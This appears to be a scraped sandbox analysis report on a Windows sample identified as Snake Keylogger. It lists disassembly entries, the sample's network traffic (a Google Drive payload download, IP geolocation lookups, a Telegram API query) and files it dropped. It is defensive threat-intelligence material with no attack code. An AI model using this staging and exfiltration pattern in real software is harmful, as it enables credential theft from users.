Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D6857h	9_2_399D6588
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D9A4Fh	9_2_399D9780
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D2877h	9_2_399D25A8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DDAD0h	9_2_399DD7D8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D5AA7h	9_2_399D57D8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DC49Fh	9_2_399DC1D0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D8C9Fh	9_2_399D89D0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D7A97h	9_2_399D77C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DF8C0h	9_2_399DF5C8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DAC8Fh	9_2_399DA9C0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D3AB7h	9_2_399D37E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D23E7h	9_2_399D2118
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D43D7h	9_2_399D4108
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D7607h	9_2_399D7338
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DA7FFh	9_2_399DA530
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D3627h	9_2_399D3358
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D5617h	9_2_399D5348
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D880Fh	9_2_399D8540
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DC00Fh	9_2_399DBD40
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DE038h	9_2_399DDD40
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D1F57h	9_2_399D1C88
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D5187h	9_2_399D4EB8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DBB7Fh	9_2_399DB8B0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D7177h	9_2_399D6EA8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DA36Fh	9_2_399DA0A0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DF3D0h	9_2_399DF0D8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D3197h	9_2_399D2EC8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D63C7h	9_2_399D60F8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DE9F0h	9_2_399DE6F8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D95BFh	9_2_399D92F0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D838Fh	9_2_399D80E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D6CE7h	9_2_399D6A18
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DEF08h	9_2_399DEC10
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D9EDFh	9_2_399D9C10
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DE500h	9_2_399DE208
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D2D07h	9_2_399D2A38
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DB6EFh	9_2_399DB420
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D7F27h	9_2_399D7C58
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DB121h	9_2_399DAE50
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D3F47h	9_2_399D3C78
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399DD568h	9_2_399DD270
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D5F37h	9_2_399D5C68
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 399D912Fh	9_2_399D8E60
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 39A50ED0h	9_2_39A50BD8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 39A50338h	9_2_39A50040
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then jmp 39A50940h	9_2_39A50648
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_39A678F8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_39A678E8

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1p-SJOY1qwmYPiU11hAoSaIe4Bw5Stu89 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1p-SJOY1qwmYPiU11hAoSaIe4Bw5Stu89&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pkNnK2ya0f.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsd6C80.tmp

C:\Users\user\AppData\Local\Temp\nsm6827.tmp

C:\Users\user\AppData\Local\Temp\nsm6828.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsn6A4C.tmp

C:\Users\user\AppData\Local\Temp\nss6B56.tmp

C:\Users\user\AppData\Local\Temp\nst6DC9.tmp

C:\Users\user\AppData\Local\antinuke\Pennatilobate\Blodtryksforhjelsernes.dwe

C:\Users\user\AppData\Local\antinuke\Pennatilobate\Plattnerite.Myi

C:\Users\user\AppData\Local\antinuke\Pennatilobate\Reservoirs.age

C:\Users\user\AppData\Local\antinuke\Pennatilobate\Skihejser.cen

C:\Users\user\AppData\Local\antinuke\Pennatilobate\Woodcarver.jpg

C:\Users\user\AppData\Local\antinuke\Pennatilobate\damageably.Act

C:\Users\user\AppData\Local\antinuke\Pennatilobate\denierens.jpg

Windows Analysis Report
pkNnK2ya0f.exe